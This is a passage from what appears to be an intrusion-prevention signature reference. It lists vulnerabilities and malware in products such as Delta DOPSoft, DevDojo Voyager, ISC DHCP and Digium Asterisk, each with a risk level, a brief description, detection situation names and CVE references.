
Last changed:

sgpkg-ips-1409-5242

Platform:

Generic

Software:

Delta Industrial Automation DOPSoft

Type:

Buffer Overflow

Description:

Improper handling of MulBlank records in XLS files causes a buffer overflow vulnerability in Delta Automation DOPSoft. A successful exploit allows an attacker to run arbitrary code on the target system.

Situation:

File-OLE_Delta-Industrial-Automation-DOPSoft-XLS-Mulblank-Record-Parsing-Heap-Buffer-Overflow

References:

CVE-2021-38406
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38406

Delta-Industrial-Automation-DOPSoft-XLS-MulRk-Record-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Delta Industrial Automation DOPSoft

Risk:

Moderate

First detected in:

sgpkg-ips-1420-5242

Last changed:

sgpkg-ips-1420-5242

Platform:

Generic

Software:

Delta Industrial Automation DOPSoft

Type:

Buffer Overflow

Description:

Improper handling of MulRk records in XLS files causes a buffer overflow vulnerability in Delta Automation DOPSoft. A successful exploit allows an attacker to run arbitrary code on the target system.

Situation:

File-OLE_Delta-Industrial-Automation-DOPSoft-XLS-MulRk-Record-Parsing-Heap-Buffer-Overflow

References:

CVE-2021-38406
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38406

Delta-Infrasuite-Device-Master-Checkloadingstartupconfig-Dir-Traversal

About this vulnerability:

A vulnerability in Delta Electronics InfraSuite Device Master

Risk:

Moderate

First detected in:

sgpkg-ips-1526-5242

Last changed:

sgpkg-ips-1526-5242

Platform:

Generic

Software:

Delta Electronics InfraSuite Device Master

Type:

Directory Traversal

Description:

Improper processing of ZIP archives in the CheckLoadingStartupConfig function causes a directory traversal vulnerability un Delta Electronics InfraSuite Device Master. A successful exploit may allow an attacker to execute arbitrary code with the privileges of the affected user.

Situation:

Generic_CS-Delta-Electronics-Infrasuite-Device-Master-Checkloadingstartupconfig-Directory-Traversal

References:

CVE-2022-41772
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41772

DenyAll-Web-Application-Firewall-Remote-Code-Execution

About this vulnerability:

A DenyAll Web Application Firewall Remote Code Execution vulnerability

Risk:

High

First detected in:

sgpkg-ips-1020-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

DenyAll

Type:

Input Validation

Description:

A vulnerability in DenyAll Web Application Firewall which allows remote attackers to execute arbitrary code through the 'type' parameter due to the lack of input validation.

Situation:

HTTP_CRL-DenyAll-Web-Application-Firewall-Remote-Code-Execution

References:

CVE-2017-14706
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14706

Destiny-Media-Player-Buffer-Overflow

About this vulnerability:

A Destiny Media Player Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-800-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP

Software:

Destiny Media Player

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Destiny Media Player, version 1.61, which allows remote attackers to execute arbitrary code via a long string in a .pls playlist file.

Situation:

File-Text_Destiny-Media-Player-Buffer-Overflow

References:

CVE-2009-3429
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3429

BID-33091
http://www.securityfocus.com/bid/33091

OSVDB-53249
http://www.osvdb.org/53249

DevDojo-Voyager-Arbitrary-File-Leak-And-Deletion-CVE-2024-55415

About this vulnerability:

An attempt to exploit a vulnerability in DevDojo Voyager detected

Risk:

High

First detected in:

sgpkg-ips-1834-5242

Last changed:

sgpkg-ips-1834-5242

Platform:

Generic

Software:

DevDojo Voyager

Type:

Input Validation

Description:

DevDojo Voyager through 1.8.0 is vulnerable to path traversal at the "/admin/compass" route.

Situation:

HTTP_CSU-DevDojo-Voyager-Arbitrary-File-Leak-And-Deletion-CVE-2024-55415

References:

CVE-2024-55415
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55415

DevDojo-Voyager-Reflected-XSS-CVE-2024-55416

About this vulnerability:

An attempt to exploit a vulnerability in DevDojo Voyager detected

Risk:

High

First detected in:

sgpkg-ips-1834-5242

Last changed:

sgpkg-ips-1834-5242

Platform:

Generic

Software:

DevDojo Voyager

Type:

Input Validation

Description:

DevDojo Voyager through version 1.8.0 is vulnerable to reflected XSS via "/admin/compass" route. By manipulating an authenticated user to click on a link, arbitrary Javascript can be executed.

Situation:

HTTP_CSU-DevDojo-Voyager-Reflected-XSS-CVE-2024-55416

References:

CVE-2024-55416
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55416

DEWESoft-X3-Internal-Command-Access-CVE-2018-7756

About this vulnerability:

A vulnerability in DEWESoft X3 SP1

Risk:

High

First detected in:

sgpkg-ips-1321-5242

Last changed:

sgpkg-ips-1321-5242

Platform:

Generic

Software:

DEWESoft X3

Type:

Insecure Configuration

Description:

RunExeFile.exe in the DEWESoft X3 SP1 installer allows unauthenticated sessions on TCP port 1999. Successful exploitation of this vulnerability may allow arbitrary code execution and access to the internal commands.

Situation:

Generic_CS-DEWESoft-X3-Internal-Command-Access-CVE-2018-7756

References:

CVE-2018-7756
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7756

DHCP-ISC-DHCP-dhclient-script_write_params-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in ISC DHCP dhclient

Risk:

High

First detected in:

sgpkg-ips-235-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ISC DHCP dhclient

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in ISC DHCP dhclient. The vulnerability can be exploited by sending a malicious DHCP ACK message to a vulnerable DHCP client. An exploit leads to a denial of service condition, terminating the affected application, or to system-level code execution.

Situation:

Generic_UDP-ISC-DHCP-dhclient-script-write-params-Buffer-Overflow
BOOTP_CS-ISC-DHCP-dhclient-script-write-params-Buffer-Overflow

References:

CVE-2009-0692
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692

BID-35668
http://www.securityfocus.com/bid/35668

OSVDB-55819
http://www.osvdb.org/55819

Dhcpcd-Dhcpv6-Dhcp6_Findna-Buffer-Overflow

About this vulnerability:

A vulnerability in Dhcpcd

Risk:

Moderate

First detected in:

sgpkg-ips-1156-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Dhcpcd

Type:

Buffer Overflow

Description:

Improper handling of NA and TA addresses in DHCPv6 messages causes a buffer overflow vulnerability in DHCPCD. A successful exploit may allow an attacker to run arbitrary code with the privileges of the daemon.

Situation:

Generic_UDP-Dhcpcd-Dhcpv6-Dhcp6_Findna-Buffer-Overflow

References:

CVE-2019-11577
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11577

Dhcpcd-Packet-Size-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Dhcpcd Dhcpcd

Risk:

High

First detected in:

sgpkg-ips-461-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

SUSE Linux Enterprise Server 11;Debian GNU/Linux

Software:

Dhcpcd

Type:

Buffer Overflow

Description:

A vulnerability has been reported in dhcpcd that could allow remote attackers to execute arbitrary code on a vulnerable target. The vulnerability is due to insufficient validation on packets size supplied by DHCP clients. A remote attacker impersonating a DHCP server on the adjacent network could exploit this by sending a crafted packet to the target host. Successful exploitation would allow an attacker to inject arbitrary code into the DHCP Client.

Situation:

Generic_UDP-Dhcpd-Packet-Size-Stack-Buffer-Overflow
BOOTP_CS-Dhcpd-Packet-Size-Stack-Buffer-Overflow

References:

CVE-2012-2152
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2152

BID-53354
http://www.securityfocus.com/bid/53354

OSVDB-83228
http://www.osvdb.org/83228

Dhcpv6-Buffer-Overread-CVE-2023-38152

About this vulnerability:

An attempt to exploit a vulnerability in Windows DHCPv6 server detected

Risk:

High

First detected in:

sgpkg-ips-1630-5242

Last changed:

sgpkg-ips-1630-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

Buffer overread vulnerability in Windows DHCPv6 implementation.

Situation:

Generic_UDP-Dhcpv6-Buffer-Overread-CVE-2023-38152

References:

CVE-2023-38152
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38152

ms23-sep
http://technet.microsoft.com/security/bulletin/ms23-sep

Diaenergie-SQL-Injection-CVE-2024-4548

About this vulnerability:

An attempt to exploit a vulnerability in DIAEnergie detected

Risk:

High

First detected in:

sgpkg-ips-1769-5242

Last changed:

sgpkg-ips-1769-5242

Platform:

Generic

Software:

Delta Electronics DIAEnergie

Type:

SQL Injection

Description:

A vulnerability in Delta Electronics DIAEnergie, version v1.10 and before, which allows remote attackers to execute arbitrary SQL commands via the RecalculateHDMWYC message.

Situation:

HTTP_CS-Diaenergie-SQL-Injection-CVE-2024-4548

References:

CVE-2024-4548
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4548

Dialerpornpaq

About this vulnerability:	DialerPornpaq
Risk:	Low
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	DialerPornpaq
Type:	Misconfiguration
Description:	DialerPornpaq is a malware that will try to perform a high-cost phone call via modem to access pornographic material.
Situation:	HTTP_CSH-Dialerpornpaq

DiamondFox-Botnet

About this vulnerability:	DiamondFox botnet
Risk:	High
First detected in:	sgpkg-ips-700-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Remote Control
Description:	DiamondFox is a botnet that can for example be used to steal information from the infected system.
Situation:	HTTP_CRL-DiamondFox-Traffic

Dicoogle-PACS-Web-Server-Directory-Traversal

About this vulnerability:	A vulnerability in Dicoogle PACS Web Server
Risk:	High
First detected in:	sgpkg-ips-1163-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Dicoogle PACS
Type:	Input Validation
Description:	A vulnerability in Dicoogle PACS Web Server, version 2.5.0, which allows remote attackers to read arbitrary files due to the lack of sufficient input validation.
Situation:	HTTP_CSU-Dicoogle-PACS-Web-Server-Directory-Traversal

Digiever-DS2105-Pro-Remote-Code-Execution

About this vulnerability:	An attempt to exploit a vulnerability in DigiEver DS-2105 Pro detected
Risk:	High
First detected in:	sgpkg-ips-1817-5242
Last changed:	sgpkg-ips-1817-5242
Platform:	Generic
Software:	DigiEver DS-2105 Pro
Type:	Input Validation
Description:	A vulnerability in DigiEver DS-2105 Pro DVRs is being exploited to spread malware. No CVE has been assigned to it yet.
Situation:	HTTP_CRL-Digiever-DS2105-Pro-Remote-Code-Execution

Digital-Watchdog-Dw-Megapix-Command-Injection-CVE-2022-34538

About this vulnerability:

A vulnerability in Digital Watchdog DW MEGApix

Risk:

High

First detected in:

sgpkg-ips-1536-5242

Last changed:

sgpkg-ips-1536-5242

Platform:

Generic

Software:

Digital Watchdog DW MEGApix

Type:

Input Validation

Description:

A command injection vulnerability has been reported in the Digital Watchdog DW MEGApix IP camera firmware version A7.2.2_20211029.

Situation:

HTTP_CRL-Digital-Watchdog-Dw-Megapix-Command-Injection-CVE-2022-34538

References:

CVE-2022-34538
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34538

Digium-Asterisk-App_Minivm-Caller-Id-Command-Execution

About this vulnerability:

A vulnerability in Digium Asterisk Open Source

Risk:

Moderate

First detected in:

sgpkg-ips-998-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Input Validation

Description:

Insufficient validation of Caller-IDs within SIP requests causes a command execution vulnerability in Digium Asterisk. A successful exploit allows an attacker to run arbitrary code on the target system without authentication.

Situation:

Generic_UDP-Digium-Asterisk-App_Minivm-Caller-Id-Command-Execution
SIP-UDP_Digium-Asterisk-App_Minivm-Caller-Id-Command-Execution

References:

CVE-2017-14100
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14100

Digium-Asterisk-Cdr-Ast_Cdr_Setuserfield-Buffer-Overflow

About this vulnerability:

A vulnerability in Digium Asterisk Open Source

Risk:

Moderate

First detected in:

sgpkg-ips-880-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Buffer Overflow

Description:

An insufficient length check causes a buffer overflow vulnerability in Digium Asterisk. A successful exploitation allows an attacker to run arbitrary code with the privileges of the daemon.

Situation:

SIP_Digium-Asterisk-Cdr-Ast_Cdr_Setuserfield-Buffer-Overflow

References:

CVE-2017-7617
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7617

Digium-Asterisk-Chan_Skinny-Sccp-Packet-Denial-Of-Service

About this vulnerability:	A vulnerability in Digium Asterisk Open Source
Risk:	High
First detected in:	sgpkg-ips-919-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Digium Asterisk
Type:	Infinite Loop
Description:	There exists a denial of service vulnerability in Digium Asterisk. A remote, unauthenticated attacker can cause a vulnerable server to terminate by sending a crafted SCCP packet.
Situation:	Generic_CS-Digium-Asterisk-Chan_Skinny-Sccp-Packet-Denial-Of-Service

Digium-Asterisk-Compound-Rtcp-Out-Of-Bounds-Write

About this vulnerability:

A vulnerability in Digium Asterisk Open Source

Risk:

Moderate

First detected in:

sgpkg-ips-1075-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Malfunction

Description:

There exists an out-of-bounds write vulnerability in Digium Asterisk. A remote, authenticated attacker can use this to execute arbitrary code on the affected system.

Situation:

Generic_UDP-Digium-Asterisk-Compound-Rtcp-Out-Of-Bounds-Write

References:

CVE-2017-17664
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17664

Digium-Asterisk-Cookie-Stack-Overflow

About this vulnerability:

A vulnerability in Digium Certified Asterisk

Risk:

Moderate

First detected in:

sgpkg-ips-573-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Resource Starvation

Description:

A stack-overflow vulnerability has been reported in Digium Asterisk. The vulnerability is due to insufficient validation of Cookie: headers in HTTP requests sent to the HTTP management interface. A remote attacker can exploit this vulnerability to cause a denial-of-service condition.

Situation:

HTTP_CS-Digium-Asterisk-Cookie-Stack-Overflow

References:

CVE-2014-2286
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2286

BID-66093
http://www.securityfocus.com/bid/66093

OSVDB-104327
http://www.osvdb.org/104327

Digium-Asterisk-CSeq-Heap-Buffer-Overflow

About this vulnerability:	A vulnerability in Digium Asterisk Open Source
Risk:	Moderate
First detected in:	sgpkg-ips-919-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Digium Asterisk
Type:	Buffer Overflow
Description:	Improper handling of a long CSeq header in a SIP request causes a heap buffer overflow vulnerability in Digium Asterisk. A successful exploitation can allow an attacker to cause a denial of service condition or in some cases, remote code execution.
Situation:	Generic_UDP-Digium-Asterisk-CSeq-Heap-Buffer-Overflow SIP_Digium-Asterisk-CSeq-Heap-Buffer-Overflow

Digium-Asterisk-File-Descriptor-Denial-Of-Service

About this vulnerability:

A vulnerability in Digium Asterisk Open Source

Risk:

Moderate

First detected in:

sgpkg-ips-574-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Resource Starvation

Description:

A denial of service condition has been reported in Digium Asterisk. The vulnerability is due to file descriptor exhaustion from a large number of crafted SIP INVITE requests. A remote attacker can exploit this vulnerability to cause a denial of service condition.

Situation:

SIP-TCP_CS-Digium-Asterisk-File-Descriptor-Denial-Of-Service
SIP-UDP_CS-Digium-Asterisk-File-Descriptor-Denial-Of-Service

References:

CVE-2014-2287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2287

BID-66094
http://www.securityfocus.com/bid/66094

OSVDB-104326
http://www.osvdb.org/104326

Digium-Asterisk-HTTP-Management-Interface-Stack-Overflow

About this vulnerability:

A vulnerability in Digium Asterisk Digiumphones

Risk:

High

First detected in:

sgpkg-ips-506-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Malfunction

Description:

A stack overflow vulnerability exists in Digium Asterisk. The vulnerability is due to an unchecked memory allocation on the stack, which can result in a stack overflow or writing of attacker-controlled data to arbitrary memory locations. A remote attacker can use this vulnerability by sending a malicious request to a vulnerable Asterisk server. Successful exploitation of this vulnerability would result in execution of arbitrary attacker code in the security context of the asterisk server or termination of the server, causing denial of service to legitimate users.

Situation:

HTTP_CSH-Digium-Asterisk-HTTP-Management-Interface-Stack-Overflow

References:

CVE-2012-5976
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5976

OSVDB-88876
http://www.osvdb.org/88876

Digium-Asterisk-HTTP-Manager-Interface-Resource-Exhaustion

About this vulnerability:

A vulnerability in Digium Asterisk Open Source

Risk:

High

First detected in:

sgpkg-ips-518-5211

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Resource Starvation

Description:

A memory exhaustion vulnerability has been found in Digium Asterisk. The vulnerability is due to the use of a user-controlled size value in a memory allocation without validation. A remote, unauthenticated attacker could exploit this vulnerability by sending a malicious HTTP request to the HTTP management interface of a vulnerable version of Asterisk. Successful exploitation would result in the service's inability to allocate memory and possibly termination of the vulnerable program, denying service to legitimate users.

Situation:

HTTP_CSH-Digium-Asterisk-HTTP-Manager-Interface-Resource-Exhaustion

References:

CVE-2013-2686
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2686

Digium-Asterisk-IAX2-Call-Number-Denial-Of-Service

About this vulnerability:

A vulnerability in Digium Asterisk Business Edition

Risk:

Moderate

First detected in:

sgpkg-ips-260-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Resource Starvation

Description:

There is a resource exhaustion denial of service vulnerability in Digium's Asterisk. The vulnerability is due to a design weakness in the way Asterisk associates messages with the calls they belong to. An unauthenticated, remote attacker can exploit this vulnerability by sending a large number of messages to a vulnerable system. Successful exploitation exhausts the call number space, resulting in a denial of service condition.

Situation:

Analyzer_Digium-Asterisk-IAX2-Call-Number-Denial-Of-Service
Generic_UDP-Digium-Asterisk-IAX2-Call-Number-Denial-Of-Service

References:

CVE-2009-2346
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2346

BID-36275
http://www.securityfocus.com/bid/36275

Digium-Asterisk-Manager-User-Shell-Command-Execution

About this vulnerability:

A vulnerability in Digium Asterisk Business Edition

Risk:

Moderate

First detected in:

sgpkg-ips-453-4333

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Malfunction

Description:

A security bypass vulnerability has been reported in Digium Asterisk. The vulnerability is due to insufficient permission validation while executing shell commands from unauthorized users. Remote, authenticated attackers without sufficient privileges can exploit this vulnerability by sending malicious requests to the target server. Successful exploitation would result in execution of arbitrary script code in the context of the affected server. Successful exploitation would result in execution of arbitrary script code in the context of the affected server.

Situation:

Generic_CS-Digium-Asterisk-Manager-Shell-Command-Usage

References:

CVE-2012-2414
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2414

BID-53206
http://www.securityfocus.com/bid/53206

OSVDB-81454
http://www.osvdb.org/81454

Digium-Asterisk-Multiple-Products-IAX2-Handshake-Denial-Of-Service

About this vulnerability:

A vulnerability in Digium Asterisk Appliance Developer Kit

Risk:

Moderate

First detected in:

sgpkg-ips-659-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Malfunction

Description:

There exists a denial of service vulnerability in multiple Digium Asterisk products. The vulnerability is due to insufficient verification of ACK responses during IAX2 handshakes by the IAX2 protocol. A remote unauthenticated attacker may exploit this vulnerability by sending a crafted message to the target server. Successful attack could create a denial of service condition on the Asterisk service. Upon successful exploitation of the vulnerability, the attack can make the target asterisk server send a large amount of data to a target host being spoofed. This might cause resource exhaustion for both the asterisk server and the target. If the attack stops sending the attacks, the target will recover in a time frame of a few minutes.

Situation:

Generic_UDP-IAX2-Malformed-ACK-Message

References:

CVE-2008-1897
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1897

BID-28901
http://www.securityfocus.com/bid/28901

Digium-Asterisk-Non-SIP-Uris-Denial-Of-Service

About this vulnerability:

A vulnerability in Digium Asterisk Open Source

Risk:

Moderate

First detected in:

sgpkg-ips-988-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Malfunction

Description:

Improper handling of non-SIP uris in SIP requests causes a denial of service vulnerability in Digium Asterisk.

Situation:

Generic_UDP-Digium-Asterisk-Non-SIP-Uris-Denial-Of-Service
SIP-UDP_Digium-Asterisk-Non-SIP-Uris-Denial-Of-Service

References:

CVE-2017-14098
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14098

Digium-Asterisk-pjsip-Channel-Driver-Register-Denial-Of-Service

About this vulnerability:	A vulnerability in Digium Asterisk Open Source
Risk:	Moderate
First detected in:	sgpkg-ips-759-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Digium Asterisk
Type:	Malfunction
Description:	A denial of service condition can be caused by an attacker by exploiting a vulnerability resulting from improper validation of request parameters.
Situation:	SIP-UDP_Digium-Asterisk-pjsip-Channel-Driver-Register-Denial-Of-Service

Digium-Asterisk-pjsip-Contact-Header-Denial-Of-Service

About this vulnerability:

A vulnerability in Digium Asterisk Open Source

Risk:

Moderate

First detected in:

sgpkg-ips-1032-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Malfunction

Description:

A denial of service exists in Digium Asterisk. A remote attacker could exploit this by sending a SIP message that does not contain a contact header. Successful exploitation could cause the Asterisk server to terminate.

Situation:

SIP_Digium-Asterisk-pjsip-Contact-Header-Denial-Of-Service

References:

CVE-2017-17850
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17850

Digium-Asterisk-pjsip-In-Dialog-Message-Request-Denial-of-Service

About this vulnerability:

A vulnerability in Digium Asterisk Open Source

Risk:

Moderate

First detected in:

sgpkg-ips-1183-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Malfunction

Description:

There has been reported a denial-of-service vulnerability in Asterisk. Succesful exploitation can lead in denial-of-service conditions.

Situation:

Generic_UDP-Digium-Asterisk-pjsip-In-Dialog-Message-Request-Denial-of-Service
Generic_TCP-Digium-Asterisk-pjsip-In-Dialog-Message-Request-Denial-of-Service
SIP_Digium-Asterisk-pjsip-In-Dialog-Message-Request-Denial-of-Service

References:

CVE-2019-12827
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12827

Digium-Asterisk-pjsip-Stack-ACK-Denial-Of-Service

About this vulnerability:	A vulnerability in Digium Asterisk Open Source
Risk:	High
First detected in:	sgpkg-ips-842-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Digium Asterisk
Type:	Malfunction
Description:	There exists a denial of service vulnerability in Digium AsteriskPJSIP stack. A remote, unauthenticated attacker can use this to cause a denial of service condition.
Situation:	SIP-UDP_Digium-Asterisk-pjsip-Stack-ACK-Denial-Of-Service

Digium-Asterisk-pjsip_Multipart_Parse-Denial-Of-Service

About this vulnerability:	A vulnerability in Teluu Ltd. PJPROJECT
Risk:	High
First detected in:	sgpkg-ips-937-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Teluu Ltd. PJPROJECT; Digium Asterisk
Type:	Malfunction
Description:	There exists a denial of service vulnerability in Digium Asterisk.
Situation:	SIP-UDP_Digium-Asterisk-pjsip_Multipart_Parse-Denial-Of-Service

Digium-Asterisk-Res_HTTP_WebSocket-HTTP-Upgrade-Request-Denial-Of-Service

About this vulnerability:

A vulnerability in Digium Asterisk Open Source

Risk:

Moderate

First detected in:

sgpkg-ips-1117-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk Open Source; Digium Certified Asterisk

Type:

Input Validation

Description:

A denial-of-service vulnerability has been reported in Digium Asterisk. The vulnerability is due to improper handling of HTTP Upgrade requests during initial WebSocket connection establishment within the res_http_websocket module of Asterisk. A remote attacker could exploit this vulnerability by sending crafted HTTP requests to the target server. Successful exploitation could result in a denial-of-service condition.

Situation:

HTTP_CS-Digium-Asterisk-Res_HTTP_WebSocket-HTTP-Upgrade-Request-Denial-Of-Service

References:

CVE-2018-17281
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17281

Digium-Asterisk-Res_pjsip_pubsub-Out-Of-Bounds-Write

About this vulnerability:

A vulnerability in Digium Asterisk Open Source

Risk:

Moderate

First detected in:

sgpkg-ips-1049-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Malfunction

Description:

Improper processing of accept headers in SUBSCRIBE requests causes an out of bounds write vulnerability in Asterisk. A successful exploit allows an attacker to cause a denial of service condition or execute code with the privileges of the daemon.

Situation:

SIP_Digium-Asterisk-Res_pjsip_pubsub-Out-Of-Bounds-Write

References:

CVE-2018-7284
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7284

Digium-Asterisk-RTP-Stack-Information-Disclosure

About this vulnerability:

A vulnerability in Digium Asterisk Open Source

Risk:

Moderate

First detected in:

sgpkg-ips-999-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Malfunction

Description:

Improper handling of RTP and RTCP packets causes an information disclosure vulnerability in Asterisk. A successful exploit allows potentially sensitive information to be accessed by a remote attacker.

Situation:

Generic_UDP-Digium-Asterisk-RTP-Stack-Information-Disclosure

References:

CVE-2017-14099
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14099

Digium-Asterisk-SIP-Channel-Driver-Denial-Of-Service

About this vulnerability:

A vulnerability in Digium Asterisk Open Source

Risk:

Moderate

First detected in:

sgpkg-ips-420-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Generic SIP application

Type:

Input Validation

Description:

There is a denial of service vulnerability in Digium Asterisk's SIP channel driver. The vulnerability is due to the way an uninitialized variable is handled in a malformed REGISTER request. A remote unauthenticated attacker can exploit this vulnerability by sending a malformed request. Successful exploitation will crash the application, resulting in denial of service.

Situation:

SIP_Empty-Contact-Header
SIP_Method-REGISTER-Without-Contact-Header

References:

CVE-2011-4063
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4063

BID-50177
http://www.securityfocus.com/bid/50177

Digium-Asterisk-SIP-Invalid-Response-Code-Denial-Of-Service

About this vulnerability:

Null-dereference vulnerability in the handling of SIP reponse messages in Digium Asterisk

Risk:

Moderate

First detected in:

sgpkg-ips-114-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Malfunction

Description:

There is a null-dereference vulnerability in the handling of SIP reponse messages in Digium Asterisk. A remote authenticated attacker can send a crafted SIP response to the target server to terminate the vulnerable Asterisk server causing a denial of service condition.

Situation:

SIP-UDP_CS-Digium-Asterisk-SIP-Invalid-Response-Code-Denial-Of-Service

References:

CVE-2007-1594
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1594

BID-23093
http://www.securityfocus.com/bid/23093

Digium-Asterisk-SIP-SDP-Header-Parsing-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Digium Asterisk Open Source

Risk:

High

First detected in:

sgpkg-ips-520-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Asterisk Open Source. The vulnerability is due to insufficient boundary checking when parsing attribute strings in SIP SDP headers and allows overflowing a stack buffer with an overly long string. Remote, unauthenticated attackers could exploit this vulnerability by sending a specially crafted SIP message to the vulnerable server. Successful exploitation would cause a stack-based buffer overflow that could allow the attacker to execute arbitrary code on the vulnerable system.

Situation:

SIP-TCP_CS-Digium-Asterisk-SIP-SDP-Header-Parsing-Stack-Buffer-Overflow
SIP-UDP_CS-Digium-Asterisk-SIP-SDP-Header-Parsing-Stack-Buffer-Overflow

References:

CVE-2013-2685
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2685

OSVDB-91753
http://www.osvdb.org/91753

Digium-Asterisk-SIP-Sscanf-Denial-Of-Service

About this vulnerability:

A denial of service vulnerability in Digium Asterisk

Risk:

Moderate

First detected in:

sgpkg-ips-250-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Input Validation

Description:

There is a denial of service vulnerability in Digium Asterisk SIP Channel Driver. The vulnerability is due to insufficient input validation when processing maliciously crafted SIP requests. Remote authenticated attackers could exploit this vulnerability by crafting SIP requests that contain excessively long numeric strings. Successful exploitation could result in a denial of service condition.

Situation:

Generic_TCP-CS-Digium-Asterisk-SIP-Sscanf-Denial-Of-Service
SIP-TCP_CS-Digium-Asterisk-SIP-Sscanf-Denial-Of-Service

References:

CVE-2009-2726
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2726

BID-36015
http://www.securityfocus.com/bid/36015

Digium-Asterisk-Skinny-Channel-Driver-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Digium Asterisk Open Source

Risk:

High

First detected in:

sgpkg-ips-452-4333

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Digium Asterisk

Type:

Buffer Overflow

Description:

There is a heap buffer overflow vulnerability in Digium Asterisk. The vulnerability is due to a bounds checking error while handling KEYPAD_BUTTON_MESSAGE events in the Skinny channel driver. The vulnerable code does not check the number of these messages and can write past the end of a heap buffer allocated for them. A remote attacker can exploit this vulnerability to overflow the buffer and execute arbitrary code on the vulnerable system. If code execution is unsuccessful, this can lead to a denial of service condition.

Situation:

